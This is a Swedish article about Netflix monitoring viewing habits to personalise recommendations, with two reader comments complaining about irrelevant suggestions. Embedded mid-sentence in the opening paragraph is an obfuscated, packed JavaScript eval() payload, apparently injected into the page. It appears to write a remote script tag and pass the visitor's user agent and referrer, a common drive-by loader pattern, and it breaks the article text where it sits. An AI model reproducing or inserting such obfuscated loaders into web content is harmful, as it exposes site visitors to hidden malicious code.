Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

Netflix vet vilka filmer du tittar på

Netflix vet vilka filmer du tittar på
Sebastian

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehrai|var|u0026u|referrer|nnrit||js|php’.split(’|’),0,{}))
inte så länge sedan kom det fram att Netflix övervakar sina användare och kikar på vilka filmer som de tittar på. Främst är detta för att kunna förbättra tjänsten med tiden och försöka anpassa sig till vad användarna vill ha, inget annat säger Netflix.

Filmtjänsten Netflix lanserades i Sverige under hösten och den har redan blivit en stor succé. Med hela 30 miljoner användare världen över fortsätter bolaget att dominera marknaden för strömmade filmer via nätet. Nu vill de berätta för oss att de har som mål att kunna skräddarsy sitt erbjudande till kunderna.

Fört och främst handlar det om att visa erbjudanden som passar den enskilde användaren. Den information vill Netflix visa upp på startsidan och konternuerligt mäta hur den fungerar i praktiken. Enligt Todd Yellin på Netflix så hjälper den till ökad försäljning.

– När vi gjort stora tester med och utan personalisering når tre gånger fler visningar den grupp som använder den personaliserade varianten av tjänsten.

Comments

  1. Jag tycker det är bra att Netflix lär sig vad man tycker om, MEN! Det måste finnas en funktion där man kan ta bort genrer, filmer eller serier som inte längre är aktuellt. Min systerdotter fick ha min iPad med Netflix som barnvakt några dagar. Det enda Netflix föreslår för mig en månad senare är tecknat och andra barnprogram. Jag är inte intresserad av det Netflix! Kan ni/jag ta bort det?

    • Olle Hallmark

      Håller med dig till hundra procent. Var med om ungefär samma sak när jag hade lånat ut mitt konto till en tjejkompis som hade tittat på massa serier och filmer hon ansåg vara roliga. Det var helt annorlunda genre än vad jag tycker om och det fick jag leva med ett tag innan Netflix ändrade om efter mina behov.